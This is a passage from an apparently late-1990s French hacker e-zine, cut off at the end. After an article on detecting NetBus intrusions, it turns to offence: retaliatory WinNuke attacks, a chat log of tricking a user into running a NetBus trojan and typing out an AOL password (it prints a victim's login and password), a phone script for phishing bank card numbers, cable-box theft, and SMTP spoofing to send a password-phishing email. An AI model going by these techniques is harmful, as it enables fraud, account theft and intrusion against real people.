Y'a plein d'extantion, y'a meme pire! Bon, mais comment ce proteger de ce genre d'agression? A part le faite qu'il ne faut pas donner son IP et telecharger n'importe quoi , il y a un moyen de se detacher d'une tel agression Besoin d'un seul soft! l'anti virus de JCzic et un nuker pour plus de fun C tout! tout le reste est manuelle FANTASMON DANS LA MITHOLOGIE DE L'IMAGINATION D'UN SEUL INSTANT.... je me connecte HONNETEMMENT sur AOL et un pote vient a me parler ---------------------- Message eclaire de Bon-pote Bon-pote: salut ThreaT, sa vas? ThreaT: ouai et toi? bon-pote: moi bien, T'a entendu parler du nouveau Toneloc? ThreaT: Y'en on sorti un nouveau? bon-pote: OUai, celui la scan les PABX, CARRIER et VMBZ en profondeur puis, il ya une fonction de recherche d'outdial automatik ThreaT: ?? vas y, fait tater bon-pote: donne moi ton IP, jte l'enverais plus vite! (mantenant imaginons que je vienne de me lever avec une gueule de bois sacom, 3 tamien dans l'nez apres avoir pris du LSD pendent que jme fasse sucer pas pamela andersonne) ThreaT: 152.52.220.60 bon-pote: chte l'envoie! ThreaT: OK bon-pote: alors ThreaT: attend, sa D/L bon-pote: D/L??? ThreaT: j'essai le soft Bon-pote: haaaa ThreaT: bon, y spasse rien bon-pote: arf arf arf, j'ai le control de ton system! je ne suis pas bon-pote, ce login est pirater, je suis un imposteur, alors maintenant tu vas obeire tout en fermant ta gueule OK ThreaT: Ho Dear! je me suis fais pieger a l'insu de mon plein gres, HO My GOD!! comment je vais FAire, HO DamnatIon, It's a Big ProbLEm ThreaT: lololololo, laisse moi rigoler! bon-pote: tu ne me prend pas au serieux? je te signal qu'on est Trois sur ton dur, tien, regarde ton CDrom ThreaT: Netbus + socket ? bon-pote: et ouai connard, comme dans ton article ThreaT: Dans 5mn, vous etes tout les trois deconnecter! bon-pote: Non mais tu te prend pour qui? ThreaT: POUR TON MAITRE SALLE LAMERZ Bon-pote: pour l'instant, c'est moi qui suit en position de menacer ThreaT: Il ne faut jamais menacer "LA MENACE" ::)) bon-pote: k'é stu raconte ... (Maintenant Procedure)!! Tout d'abord, Il faut verifier qui est connecter a ma becanne et relever les IP des pseudo hackers. Donc, j'ouvre une fenetre DOS et je tape NBTSTAT -an Dos me repond un truc du style Protocole adresse local:port adresse distante:port etat IP 152.52.220.60:10 0.0.0.0*:* LISTENING IP 152.52.220.60:31 0.0.0.0*:* LISTENING IP 152.52.220.60:35 0.0.0.0*:* LISTENING IP 152.52.220.60:36 152.73.15.120:1123 ETABLISHED IP 152.52.220.60:40 152.70.213.12:1213 ETABLISHED IP 152.52.220.60:45 152.120.18.1:2000 ETABLISHED IP 152.52.220.60:75 0.0.0.0*:* LISTENING IP 152.52.220.60:60 152.73.15.120:5000 ETABLISHED IP 152.52.220.60:65 UDP 152.52.220.60: UDP 152.52.220.60: UDP 152.52.220.60: en gros, sa doit etre a peu pres sa! Bon, comment examiner ce tableau? tout d'abord regardont la dernierre colone appeller "ETAT". si je regarde bien j'ai 4 port sur ecoute et 4 port don la connection est etabli. je tien tout de suite a dire que les port sur ecoute ne revele pas une attaque! C normal. par contre les port dit "ETABLI" revele une connecion direct sur ma machine si je regarde les port "ETABLISHED", je remarque qu'il y a en a 4, alors que le pseudo hacker m'a dit qu'ils etait 3! bon, regardont la colonne "adresse distante:port". qu'st ce que l'on remarque? il y a 4 adresse IP dont 2 sont identique, ce qui veut dire que y'a un type en train de me scanner avec NETbuS, Un type qui scan mon dur avec SOcket23 et un Type qui fait les 2. bon! comment determiner qui fait quoi? je vois que l'adresse 152.120.18.1 est connecter avec le port 2000. ce qui veut dire que se petit joueur me scan avec le socket23 est que celui si n'as pas d'imagination (car on peu choisir son port de connection avec socket) maintenant regardont l'adresse 152.70.213.12! celle si est connecter sur mon port 1213! specifique a NetbuS! Donc, ce type s'amuse a verifier tout ce que je fait! maintenant jeton un coup d'oeil a l'adresse 152.73.15.120! cette adresse ce retrouve a la fois sur le port 5000 et sur le port 1120, donc ce mec la fait les 2 en meme temps! pendent qu'il scan mon DD il snif toute mes action je note ses 3 joli petite adresse sur un papier et je passe a l'etape suivante car maintenant Il faut empecher l'action de Netbus! car C avec ce soft que les pirates control ma machine. Donc j'ouvre une fenetre MS-DOS et je tape REGEDIT <> Une fois la command regedit taper, j'accede a ma BDR, "Base De Registre" Bon, une fois dans la BDR je vais dans ,, ,,, ou , je sais plus! et je regarde les clef qui ce termine par "/nomsg" PS: si les pseudo pirate control votre souris, utiliser les touche de fleche , la touche TAB, et la touche "+"! revenom a nos mouton: donc je regarde les cles qui se termine par "/nomsg" et la je vois une cle du style <"TONELOC"> "c:\windows\toneloc.exe /nomsg" Donc, la back door et poster dans Toneloc (celle du Netbus) maintenant que je sais sa! je suprime la cle, ouvre une fenetre MS-DOS et je tape au prompt C:\>cd windows C:\WINDOWS>Toneloc /remove Et voila! deja, les pseudo Hackers de merde ne control plus les fonction de ma becanne vue que je vient de faire soter Netbus! du coter des agresseur, qu'est ce qui vient de se passer? Netbus est passer de l'etat "connected to 152.52.220.60" a l'etat "No connection" donc plus de probleme de ce coter la, a part qu'il faudra bien prendre garde a effacer tout les fichier "Toneloc.exe", mais sa se seras a la fin, car un autre probleme menace! LE SOCKET ET TOUJOURS ACTIF EN MEMOIRE. Procedure EXTREMEMENT SIMPLE! je sort mon antivirus de JCzic "antisocket" et je click sur netoyer. voila! les super hackers mon fait telemment peur qu'il ne peuve plus scanner mon dur! Je met un ptit coup de dezinfectant histoire d'igienne et voila le travail VERIFION!! regardon si la contre attaque a bien marcher j'ouvre une fenetre DOS et je tape Netstat -an DOS me dit Protocole adresse local:port adresse distante:port etat IP 152.52.220.60:10 0.0.0.0*:* LISTENING IP 152.52.220.60:31 0.0.0.0*:* LISTENING IP 152.52.220.60:35 0.0.0.0*:* LISTENING IP 152.52.220.60:36 152.73.15.120:1123 TIME_WAIT IP 152.52.220.60:40 152.70.213.12:1213 TIME_WAIT IP 152.52.220.60:45 152.120.18.1:2000 TIME_WAIT IP 152.52.220.60:75 0.0.0.0*:* LISTENING IP 152.52.220.60:60 152.73.15.120:5000 TIME_WAIT IP 152.52.220.60:65 UDP 152.52.220.60: UDP 152.52.220.60: UDP 152.52.220.60: C bon, les port qui etait "ETABLISHED" sont maintenant "TIME_WAIT" ce qui veut dire inactif PETITE TOUCHE PERSONNEL! maintenant que les super hacker sont ecarter de toute infiltration, il faut rajouter la touche personnel! Je sort WINNUKE 95, et j'y rentre respectivemment les adresse 152.73.15.120, 152.70.213.12 et 152.120.18.1! je met le texte "Tchao les ptit joueur!" et je click sur ET voila, les 3 connard sont planter et obliger de rebooter. J'espere que vous avez pris note car ceci pourait tres bien vous arriver sur AOL! BON, OK mais comment se comporter en cas de tentative d'agression? Je tien tout de suite a dire que C pas parce que vous avez remarquer qu'un type essaye de vous agresser qu'il fout couper court les pont avec lui en l'insultant comme une pauvre merde car vous pourier vous retrouver sur le carreau! je vais vous montrer le Bon comportemment et le mauvait comporemment a adopter EXEMPLE DE MAUVAIS COMPORTEMMENT! ------------------------------------------- MESSAGE ECLAIRE DE "ThreaT" ThreaT: Salut ducon, sa te dit un jeu en reseau Ducon: eU ben?? ouai! ThreaT: OK, je t'envoi un fichier pour etablire le protocole Ducon: ??, T'a dit quoi la? ThreaT: voila, t'a du recevoir un fichier? regarde Ducon: T sur qu'ya pas de virus? ThreaT: T'a qu'a passer un coup d'anti virii Si T pas sur! Ducon: OK, 2 seconde ThreaT: J'attend! Ducon: C bon, y'a pas de virus! alors comment sa marche ThreaT: OK, maintenant pour qu'on puis jouer il faut que tu suive mes instruction Ducon: Ouai vas y! ThreaT: tu click sur demarrer ThreaT: executer ThreaT: Tu tape c:\windows\winipcfg.exe ThreaT: puis tu met OK Ducon: et apres ThreaT: Tu me donne ton adresse IP Ducon: sa sert a quoi l'adresse IP ThreaT: a jouer en reseau! Ducon: mais sa marche comment? (Deja, le lamer commence a me souler) ThreaT: JE SAIS PAS! Chu pas informaticien Ducon: On dirait un code secret! (La le lame s'invente des mytho) ThreaT: ARRETE de dire n'importe quoi, TU veut jouer ou pas? Ducon: be ouai! ThreaT: alors donne moi cette adresse Ducon: 132.240.321.418 (La, il commence a se foutre de ma gueule) ThreaT: Tu peu me donner la bonne STP Ducon: comment tu sait que c'est pas la bonne? ThreaT: chak chiffre doit etre entre 0 et 255 Ducon: haaa, OK, c'est 132.241.121.118 (la, j'ouvre une commande DOS et je tape Ping 132.241.121.118) (DOS me repond "Host not found", donc il se refout de ma gueule) ThreaT: Tu commence, a me chauffer la! C pas la bonne Ducon: je veut pas te la donner! ThreaT: et pourquoi? Ducon: parce que j'ai pas confiance (La je sort mon Punter, car il commence vraiment a me chauffer) ThreaT: aller connard, vas creuver en enfer!! (je met son nick dans mon punter puis je click sur 1IMpunter puis sur MAILpunter, et voila, le type et deconnecter et sa boite au lettre est saturer!) Maintenant, voyon comment agire inteligemment ----------------------------------------------------- MESSAGE ECLAIRE DE "newbie" Newbie: salut mec, sa vas ThreaT: ouai et toi Newbie: sa te dit un soft pour booster ton modem (Bon, la j'ai 2 choix: soit je lui dit que je connait le truc et qu'on peut devenir de bon amis, soit je le laisse continuer pour lui faire croire que sont truc ne marche pas, LAISSON LE CONTINUER) ThreaT: ouai, vas y envoie Newbie: attend, il faut que je voye si ta connection est compatible! ThreaT: je paris que tu veut mon adresse IP Newbie: Ben ouai! ThreaT: OK 2 seconde! (DOnc, la je sort mon scanner d'IP et je scan a partir de 152.173) (imaginons que je trouve une IP du style 152.173.1.113 qui ne m'apartient pas) ThreaT: 152.173.1.113 (De son coter, le newbie tape PING 152.173.1.113, et DOS lui repond Pinging 152.173.1.113, donc il croit que c'est MON adresse IP) Newbie: OK, je t'envoie le patch ThreaT: ok Newbie: ALors (Bon, la je n'execute pas son vieu soft pourit, mais je lui fait la finte) ThreaT: SA y'ai j'execute (LA le newbie essaie ma fausse IP mais voie qu'il n'arrive pas a se connecter) Newbie: T sur que t'a balancer le soft? ThreaT: oui oui Newbie: Tu t'est pas planter en me donnant ton IP ThreaT: non non Newbie: Merde! ThreaT: quoi? Newbie: y'a un blem ThreaT: quel jenre de blem Newbie: rien, rien ThreaT: donc, tout est impect Newbie: si l'on veut ThreaT: OK TCHAO! Newbie: bye ET voila! le newbie a lacher l'affaire sans broncher. tout sa pour dire que lorsque l'on tente de vous agresser, ne vous la jouer pas "moi jconnais alors vas te faire enculer", et surtout ne commencer pas a vous douter de votre agresseur en pleine conversation (du moin, ne lui montrer pas que vous douter de lui) car dans ce cas, l'agresseur pourais tenter de vous busted en changeans votre mot de passe d'acces reseau! DONC rester kewl en toute circonstance. Voila quelque notion qui faudra assimiler durant votre connection! Bon, si vous voulez savoir comment optenir des compte pirate, Faudra repasser que jvous ecrive un article. la technik demontrer si dessus est pratiquer sur AOL, mais celle si est praticable sur n'importe quel providers quel qu'il soit Bien sur, sur IRC , c'est beaucoup plus facile vue qu'on a meme pas besoin de demander l'IP a la victime, grace a la commande /DNS Voili voila, C a peu pres Tout! ceci n'est qu'une courte demo de l'extantion des possibiliter d'attaque par cette technik! je vous ait presenter un plan CLASSIC! on peu tres bien vous envoyer un Jeu infecter par JC, et lancer NetBUs a votre Insu, ON PEU FAIRE PLEIN DE TRUC! Donc maifiance, mais pas d'insolance OK Soyer PARANO mais jusKa un certain point, car la parano a tendence a enerver les agresseurs inveterer! Aller, a bon entendeur SAlut, #@PpY £@m3#µNt1nG! --->14<--- DEMO DE SOCIAL POUR TROYEN -------------------------- ******************************************************* *Demonstration de Social engenering sur AOL, By ThreaT* ******************************************************* le texte qui vas suivre a eter tirer d'une de mes conversation lors d'une "Cyber agression". Pour cela il faut utiliser une technik tres convoiter par les Hacker "Le social". Je ne dit pas que ce que j'ai fait etait du Hacking. loin de la. ceci etait une agression, un viol, du vandalisme, tout ce que vous vouler mais pas du HACK pour moi, ceci est juste un amusemment, voir un entrainemment au social. (c'est aussi l'ocasion de recuperer des compte pirate) voila. /Mise en situation: BUT: recuperez le password de la victime TechniK mise en oeuvre: NETBUS TrOJan competance requise: Social engenering etape a apliker: 1/ recuperer l'iP de la victime 2/ reussir a faire executer le TROJAN A LA VICTIME 3/ faire cracher le password a la victime 4/ recuperer les info 5/ Abuser des info Trojan Utiliser: NETBUS V 1.6 AGRESSEUR: DIABLO8020 (mythomane en puissance) VICTIME : Ripper684 (povre victime ka rien demander a personne) ConversaTion AUTENTIQUE, restituer dans son integraliter. tout ce qui est entre parentese sont les commentaire. DIABLO8020: Salut, T nouveau? Ripper684: oui DIABLO8020: donc tu connait pas encore le patch AOL Ripper684: nnon c'est quoi? DIABLO8020: c'est un programme qui te permet de ne pas payer ta com AOL Ripper684: moi je ne la paie pas car je suis sur un C.D d'essais DIABLO8020: oui, mais tu paye le telephone Ripper684: oui DIABLO8020: avec le patch, tu paye KE DAL Ripper684: commen l'avoir? DIABLO8020: tu le veut? Ripper684: oui DIABLO8020: si tu veut, je te le passe Ripper684: vas y, envoie DIABLO8020: il faut d'abbord que je sache si ta connection AOL est compatible Ripper684: oui DIABLO8020: click sur demarrer DIABLO8020: executer Ripper684: ok DIABLO8020: tu tape c:\windows\winipcfg.exe DIABLO8020: si ton iP = 0.0.0.0, c'est foutu Ripper684: aten DIABLO8020: ok Ripper684: l'ip est 152.172.43.235 (Etape 1 reussi. IP de la victime recuperer) DIABLO8020: ok, je t'envoi le patch DIABLO8020: il arrive dans 5 mn Ripper684: explique mois comment ēa marche ? DIABLO8020: attend, je te l'envoie puis je t'esplik DIABLO8020: ca y'é, t'a du le recevoir Ripper684: oł est-il ? DIABLO8020: regarde dans ton courier Ripper684: ok je l'ai, explique DIABLO8020: bon, telecharge le maintenant Ripper684: mon pčre veut voir d'abord, je le chargerai plus tard, sorry DIABLO8020: il veut voir quoi? Ripper684: je ne sais pas DIABLO8020: y'a une procedure a effectuer, si je te dit pas, tu trouveras jamais Ripper684: tu l'as eu oł Ripper684: vas-y dis-moi DIABLO8020: sur un site ANTI AOL Ripper684: ēa existe ?? DIABLO8020: le site existe encore DIABLO8020: mais il on retirer le patch Ripper684: oł DIABLO8020: tu vas sur yahoo DIABLO8020: et tu tape antiaol Ripper684: ok, je note Ripper684: yahoo ? DIABLO8020: www.yahoo.fr DIABLO8020: mais tu trouveras pas le patch DIABLO8020: ni la procedure Ripper684: ok, j'irai par curiosité, mais tu peux peut-etre m'indiquer la proc. DIABLO8020: Telecharge le, la procedure dure 5 mn DIABLO8020: apres, t'est tranquile Ripper684: mon pčre va gueuler s'il s'en aperēoit, il est parano des virus DIABLO8020: t'a qu'a passer l'anti virus DIABLO8020: Et je vois pas pourkoi je t'en enverais des virus Ripper684: moi, j'obéi ą mon pčre, il est pas commode DIABLO8020: il est la ton pere? Ripper684: oui mais il vient de rentrer, il est juste passé me voir 2 secondes Ripper684: mais ma mčre est lą DIABLO8020: dit lui qu'il feras des economie de telephone Ripper684: il y aura bientot toute la famille !! DIABLO8020: et ben raison de plus Ripper684: t'a quel age ? DIABLO8020: 35 Ripper684: ok je passe la main ą ma mčre DIABLO8020: ok Ripper684: comment peut on boycotter les comm. tél. ? il me semble que ēa se saurait !! convainquez moi DIABLO8020: OK, vous connessez le phreaking? Ripper684: pas du tout DIABLO8020: c'est l'art de detourner un moyen de comunication DIABLO8020: donc, de pirater le telephone Ripper684: d'accord, mais il me semble que ēa se saurait DIABLO8020: il ce trouve que dans le phreaking il y a une technik qui s'appelle le black BOX DIABLO8020: connu par Tout les pirate Ripper684: vous etes dans l'informatique ? DIABLO8020: non, telecomunication Ripper684: vous faites de la concurrence déloyale ą votre patron. pourquoi un tel cadeau ą quelqu'un dont vous ignorez tout ? DIABLO8020: parce que je me suis fait virer DIABLO8020: et je donne l'info a tout le monde DIABLO8020: pour que sa ce sache Ripper684: je suis peut źtre trčs méfiante, mais j'ai appris ą me méfier, 1000 excuses. bon ok, mais je lance l'anti virus avant. DIABLO8020: ok Ripper684: 2 mn please DIABLO8020: ok Ripper684: dis mois, une précision, c'est une dérivation des comm. sur quelqu'un d'autre ? DIABLO8020: non, j'esplik le principe DIABLO8020: sa simule a france telecom que le modem n'est pas connecter DIABLO8020: en y faisant passer une resistance de 1.8Ko DIABLO8020: entre les fil du Tel DIABLO8020: par l'intermediaire du modem Ripper684: mon mari n'est pas lą, je suis obligée de téléch. avant de passer l'anti virus ? DIABLO8020: oui Ripper684: ok, je prends le parti de te faire confiance, je téléch. DIABLO8020: vous ne serez pas dessus Ripper684: ēa charge DIABLO8020: combien de % Ripper684: 60 DIABLO8020: ok Ripper684: tu faisais quoi ą France tél. DIABLO8020: maintenance des telecomunication Ripper684: c'est super, tu t'y connais beaucoup en informat. ? DIABLO8020: un peu, pourkoi Ripper684: si j'ai bien compris tu n'as pas de boulot, je pourrais te proposer de gratter au black, pour des petits dépannages sur postes inform. DIABLO8020: t'habite ou? Ripper684: ah oui c'est vrais, j'ai toujours l'impression qu'on est pas loin, ---dans le 77 DIABLO8020: desoler DIABLO8020: c'est trop loin Ripper684: t'habite oł DIABLO8020: montelimar Ripper684: vive les nougats, je travaille dans une boite qui en vend bref, c'est chargé DIABLO8020: ok, execute le patch maintenant DIABLO8020: alo Ripper684: 2 mn, j'arrive DIABLO8020: ok Ripper684: j'ai essayer par l'explo. wind. mais ēa n'ouvre rien (Etape 2 reussi: TROJAN EXECUTER sur le poste de la victime) DIABLO8020: c'est normal DIABLO8020: y'a une derniere procedure a faire Ripper684: ok DIABLO8020: ecoute bien DIABLO8020: tu click sur demarrer DIABLO8020: programme DIABLO8020: accessoire DIABLO8020: block-note Ripper684: ok, DIABLO8020: bon, je t'esplik DIABLO8020: on vas creer un fichier Host.txt pour que le programme retrouve ta connection OK Ripper684: ok DIABLO8020: donc, dans le block note, tu tape ton login et ton password Ripper684: c'est quoi login ? DIABLO8020: ton login c'est Ripper684 Ripper684: ok DIABLO8020: t'a bien tout mis Ripper684: oui (Etape 3 reussi: LOGIN ET PASSWORD RECUPERER avec l'option LISTEN) DIABLO8020: ok, maintenant tu click sur fichier DIABLO8020: enregistrer sous DIABLO8020: et tu met Host.txt Ripper684: ok DIABLO8020: tout est OK? Ripper684: ok DIABLO8020: tu attend que sa se passe (Petite manipulation avec Netbus) Ripper684: j'ai eu un mess qui dit que c'actif et qu'on ne paye plus le tel. DIABLO8020: c'est GOOD DIABLO8020: tout est OK Ripper684: merci bien, qu'est ce qui se passe si c'est découvert ? DIABLO8020: ce ne serat pas decouvert, T'inquiete pas Ripper684: ben t'es sympa, tu veux donc que cela se sache DIABLO8020: yes Ripper684: je vais essayer de me rappeler la procédure pour jouer le tam tam, il faudrait que tu me dise comment le transférer chez les autres DIABLO8020: c'est trop compliker DIABLO8020: tu risk de t'emmeler les pinceau DIABLO8020: si t'a des mec interesser tu me le dit OK Ripper684: ok ton adresse com c'est quoi DIABLO8020: diablo8020@aol.com Ripper684: Merci, DIABLO8020: Bye Ripper684: bye Et voila, Petite demonstration de Social. est ce que vous avez remarquer a quelle vitesse il faut debiter du mytho! J'espere que vous n'avez pas cru un mot de ce que disait. DEJA mon nick n'est pas DIABLO8020, c'est un login pirater Je ne travaille pas a france telecom Il n'y a jamais eu de patch pour ne pas payer les com AOL je n'habite pas a montelimard je n'est pas 35 ans le Black box ne s'applik pas sur les modems diablo8020@aol.com n'est pas ma vrais adresse le site ANTI AOL ne contient pas de tel soft. et mon TROJAN est detectable par les Anti virus. donc! TOUT BEIGNE. Bon, tout sa pour dire que le social est un Art, essayer pour voir, il faut des annees de pratique pour arriver a faire gober de tel connerie. Je le repete Haut et fort. CECI N'EST PAS DU HACKING, mais de l'entrenemment au social. N'aller pas effacer le HD de votre victime car vous aver reussi a lui faire gober vos connerie. PS: login=Ripper684, password=AB7600 essayer toujour! mais je doute que sa marche encore. des remarque, des plainte , des insultes ou des suggestion. No problem. ThreaT@Caramail.com ThreaT. Mais jusqu'ou nous meneras la connerie Humaine.... --->15<--- SOCIAL AU TELEPHONE ------------------- BOnjour ! Voila technike tres simple ki deamnde seulement des couilles: L'appel telephonik ! et oui explications... tu prends ton tel, tu ne prepare pas de papier car ca fait foirer qd on lit numero au hasard, dans ta region pour pas payer de comm trop longue: F phreaker v victime v:allo (F:a l'huile( nan je rigole)) F:bj madame leon durand de la banque de france v:oui ? F:voila nous avons eu un prob de piratage et certains numeros de cartes bleues on ete volees suite a un piratage de nos donnees. v:ah merde alors (pas content) F:mais ne vous inkietez pas votre numero a ete garde (sous entendu t'as eu de la chance cocotte !)et vous ne riskez rien . v: ah bon ben alors pkoi vous m'appelez ? F:nous recodons toutes nos informations et avons besoin de votre aide v:c a dire ? F:vous devez seulement preciser votre adresse et votre numero de carte bleue ainsi ke sa date de validité.(sec et convaincant) euh tu te fous de ma gueule petit con? ou encore :zetes pas foo ? bon dites ke c important mais si c pas un pigeon laissez tomber vite. v:< oui attendez un instant je vais chercher le necessaire... --> YES donc voila , il fo savoir k'il vo mieux passer bp d'appels plutot ke de s'attarder sur un seul type desolé pour mademoiselles,mais les meufs sont plus faciles a convaincre et sur elles insistez un peu (surtout sur les femmes au foyer) si vous appelez a des horaires ki ne sont pas de buro, utilisez l'argument ke c une urgence et ke voo faites des heures sup ! la meilleure technike c l'entrainement oau debut on flippe puis ca vient vite Bolliop bolliop@caramail.com www.chez.com/mvm --->16<--- HACKER LE CABLE --------------- par DREAD,member of M*V*M DISCLAMER :comme dab vous connaisser la chanson :je ne suis en aucun cas responsable des agissement des personnes ayant pris connaissance de ces information purement educative. Conseils pour novice INTRO: Tout le monde en ce moment parle du cable et deja des aplication pour aller sur le net sont prevus. Lecable annonce des debits impressionnant qui font rever tout les adepte du telechargement .mais mieux que tout les fournisseur annonce qu ils vont cree un abonnement au mois avec connexion illimitee et surtout gratuite! Mais pour vous petit malin j'ai deja imagine quelque combine bien plus interressante niveau prix L'ARRIVEE DU CABLE L'arrivee du cable est quelque chose a surveiller avec impatience.Certain diront:"ouui mais moi j'habite en ville et j'ai deja le cable depuie longtemp!!" est bien c'est domage pour eux car ēa va leur compliquer la tache Donc pour ceux qui habite dans un bled ou le cable va bientot arriver: -Aller a la reunion d'information donne par le founisseur du cable , normalement tout les personne du village reussoive une invite -Prendre le plus de rensseignement -ET attendre jusqu'a ce qu'il commence les traveaux. C'est la que recherche commence. Il faut trainer le soir dans les rues pour faire ces decouvertes,il faut trouver le QG des traveaux. Une foie ce lieu trouve il faut chercher des espece de boite pu d'armoire electreique beige , elles peuvent etr dans des cartons.Il faut ouvrir c'est y boite et prendre tout ce qui traine surtout si lil ya des clef. Si les clefs ne sont pas lą il faut attendre qu'il est commencer a installer les boites c-a-d les cimenter sur le bord des routes normallement les clef sont lą.ET apres demultiple essais on s'apperēoit que c'est un passe pour tout les boite relais pour le cable TYPES DE BOITES Pour pouvoir avoir acces au boite il faut avoir la clef sauf pour la toute petite ou une simple pince suffit -Il ya le's tout petite boite beige sans grand interet elle ne sert qu'a multiplier le cable pour 3 ou 4 maison -Il y a une boite pus haute mais pas plus large dedans il y a apparement un petit ampli pour les signeaux et un dispatcheur -Il y a les boite aussi haute mais plus large avec une grande porte a l'interieur il y a des ampli un transfo des disjoncteur une prise electrique qui pourra servir plus tard et un decodeur -Enfin il y a les bčte haute large avec 2 portes dedans il ya la meme chose mais en plus grand nombre Toute les boite ennoncer se truve surtout dans les village car en ville il y a surtout des boite acrocher au poto FT et EDF je ne suis jamai saller voir ce qu il y a dedans pour une raison de manque de discretion EXPLICATION Apparement la distribution du cable se fait de faēon differente selon le founisseur J ai personnellement constate 2 type de distribution -Dans un cas l utilisatuer n a pas besoin de decodeur chez lui j en ait donc deduis que la fibre optique aller jusque dans les armoire et que c est lą que se trouve le decodeur qui sert en fait a plusieure personne .Pour la connexion internet il faut dans ce cas demander que l instalateur rajoute un boitier pour la connexion -Dans le 2 cas chaque utilisateur a son decodeur chez lui il doit l acheter ou le louer. Sur le decodeur il y a une prise pour la connexion APRES L EXPLICATION COMMENT EN PROFITER Pour avoir la tele cabler moin chere ou meme gratos,il faut: -Que le cable passe dans ta rue -Avoir un ou des voisin avec qui tes pot OU ne pas avoir peur de se faire chopper Si tu es pot avec tes voisin et qu ils habite pas trop loin tu peut prendre un habonement pour 2 ou 3 C est plus simple si il installe le cable sans decodeur :il faut que tu t arrange avec tes voisin pour prendre un cable pour plusieur ,il faut faire installer je cable chez la personne qui se trouve le plus au centre Le cable est un cable d antenne normale l instalateur pose un dispatcheur dans le garage il peut allimenter 3 ou 4 tele de la il faut faire partir un fil jusqu a chez les voisin Si l instalation se fait avec decodeur particulier il faut faire partir le fil de derriere le decodeur ce qui apporte plus de probleme Si ta pas peur tu prend ton fils de tele avec le bon raccord et tu va te brancher direct dans la borne TRES RISQUER !! Malheuresement je manque de renseignement sur le connexion internet je ne peut donc dire que peut de chose mais surrement que cet ete cet article aura une suite speciale internet par le cable De plus le fait d etre a plusieur sur un cable pourrait cree des probleme de debit TOUTE CES INFORMATION SON UNIQUEMENT THEORIQUE VU LA JEUNESSE DU CABLE AUCUN TEST N A PUT ETRE FAIT D AUTANT PAS A MA CONNAISSANCE C EST POURQUOI SI VOUS AVEZ DES CORRECTION A APPORTER ELLE SONT LE BIEN VENUE MOI MEME N AYANT PAS LE CABLE ET N AYANT AUCUNE FORMATION SUR CE SUJET --->BONUS<--- DIVERS PETIT TRUCS & ASTUCES ---------------------------- La plupart de ses truc son donner par ThreaT, mais vue que j'ai appris tous sa par le bier d'experiance dont certain element m'on eter apris par d'otre, je ne me permet pas de m'en aproprier le credit Bon, nous alons donner ici quelques petit truc et astuce, qui peuvent servir de temp a autre. Certain de ces truc n'on rien a voir avec le HCP! SOMMAIRE.. 1/Eteindre les Rues 2/Ecouter une conversation telephonik sans se faire entendre 3/comment nuker une conversation telephonik 4/telephoner gratos de portable a portable 5/envoyer un mail anonyme manuellement 6/ce faire reveiller par FT gratos! 7/Froder le metro lyonnais. 8/Finter les Alcotest. 9/comment Kuter un Telephone Portable --->1/ETEINDRE LES RUES. Sa vous est jamais arriver lors d'une operation de Hustling ,de Trash ou de beigebox, d'etre enmerder par des putain de lampadaire qui vous eclairait la geule pendent votre forfait :( Comment eteindre ces putain de lampadaire? A/eteindre un sale lampadaire a court terme bon, pour eteindre un lampadaire a cour terme (5MN) il fo que celui si soit monter sur un pied en metal! il sufit de lui mettre un bon coup de savate ce qui provoqueras un cours circuit dans la lampe, et eteindra le lampadaire pendent 5mn "ceci ne marche pas avec les gros lampadaire en beton" B/eteindre tout les lampadaire en beton donc, pour cela il fo trouver le transfo de la rue, une fois celui si trouver il fo l'ouvrir avin d'y abaisser l'interupteur, ce qui eteindra caremment toute la rue. une autre technik consiste a emmetre une lumiere (bougie, lampe de poche, laser) dans la photo resistance du transfo ---->2/ECOUTER UNE CONVERSATION TEL SANS CE FAIRE ENTENDRE Tres simple. si vous avez un ancien telephone, y'a 2 facon 1/ vous demonter le conbiner de la ou vous parler, et vous y virer le HP, mais cette technik se remark trop, et moi j'laime pas, donc 2/vous demonter votre telephone, et vous deviser le fil qui ce trouve tout a gauche de la bande de branchemment tester et approuver! ---->3/NUKER UNE CONV TEL Imaginer que votre bahu appelle cher vous pour dire a votre pere que vous ete pas venu depuis 3 mois! Putain, il fo couper la conversation et VITE. tres simple, va dans une autre piece ou il y a une ligne telephonik. demonte la prise et coursircuite la ligne en branchent le blanc et le gris ensemble. ceci auras pour effet de lancer un gros blanc dans la conversation qui obligeras les deux interlocuteur a racrocher croyant qua la ligne est pourit ---->4/PHONER GRATOS DE PORTABLE A PORTABLE Bon, je tient a dire que les technik que je vais dire ne marche pas sur tout les portable, donc aller y molo si sa marche pas. de plus il fo que la converse ce passe entre 2 portable. 1/ tu compose le N° de ton pote en le finissant par 00# 2/ tu appelle ton pote, et une fois que celui si a decrocher tu tape 2 fois sur la touche "NO" et tu termine par # ---->ENVOYER UN MAIL ANONYME MANUELLEMENT. Bien qu'il existe des soft pour cela , on vas vous espliker comment envoyer des mail anonyme ou des mail spoofer. etape 1: trouver le serveur smtp du domaine a mailer etape 2: s'y connecter etape 3: composer le mail etape 4: se casser exemple de mail spoofing du serveur CARAMAIL 1/trouver le smtp donc la vous aller sous dos et vous taper tracert www.caramail.com dos repont un truc du type Tracing route to [205.65.123.8] www.caramail.com over a maximum of 30 hop 1 10ms 10ms 10ms www.tamere.com [221.121.21.67] 2 32ms 32ms 12ms www.lamerz.com [225.221.32.1] 3 22ms 12ms 34ms www.onsenfou.com [221.212.3.43] 4 21ms 34ms 12ms www.caramail.com [205.65.123.8] Trace complete. etape 2 bon, on vas commencer a balancer des connection sur le port 25 afin de trouver ou est le serveur SMPT! donc on commence par la fin C:\>telnet 205.65.123.8 25 connection refuser! C:\>telnet 221.212.3.43 25 connection refuser C:\>telnet 225.221.32.1 25 BingO! Connected bla bla bla. donc, maintenant qu'on est sur le SMPT, on passe a l'etape 3 HELO www.caramail.com mail from:Administrateur@caramail.com rcpt:victime@caramail.com subject:Probleme d'identification data: suite a un probleme de la part de nos operateur, nous avons le regret de vous informer que votre compte caramail a ete pirate. afin de pouvoir identifier les auteur de cette action nous vous demandons de changer votre mot de passe par MVMHC ce qui nous permetra d'identivier les technique uiliser par les malfaiteur. merci de votre compreantion. administration caramail. . <--- le point sert a finir le message et voila! la victime recevra un courier de l'administrateur qui lui dmande de changer son pass! (cette technik est utiliser pour hacker des compte multimania) ---->6/CE FAIRE REVEILLER GRATOS PAR FT vous connesser tous le rappelle automatique "*55*HHMM#" ceci sert au gens comme moi qui on un reveil pourit qui marche une nuit sur quatre et qui ne sonne pas asser fort pour les reveiller. selemment, pour ce faire reveiller par FT il fo payer 3,60F un peut cher non. donc, tres simple (reserver au phreaker) il fo une VMB avec apelle automatique et programmer le rappelle a 'l'heure ou vous vouler vous faire 